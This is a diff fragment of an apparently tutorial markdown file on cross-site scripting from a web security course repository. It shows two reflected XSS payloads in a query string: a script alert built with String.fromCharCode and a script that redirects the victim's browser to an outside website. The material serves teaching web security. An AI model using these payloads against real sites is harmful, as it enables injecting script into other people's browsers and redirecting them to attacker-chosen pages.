kkneomis/Web-Security-I/xss.md

 =<script>alert(String.fromCharCode(77,77,69,32,114,48,99,107,115,33))</script>
 ```

-Alternatively, we can redirect the user to different website of our desire.
+We can also redirect the user to different website of our desire.
 ```
 ?firstname=simeon&lastname=
 <script>window.location= "http://www.simeonkakpovi.com";</script>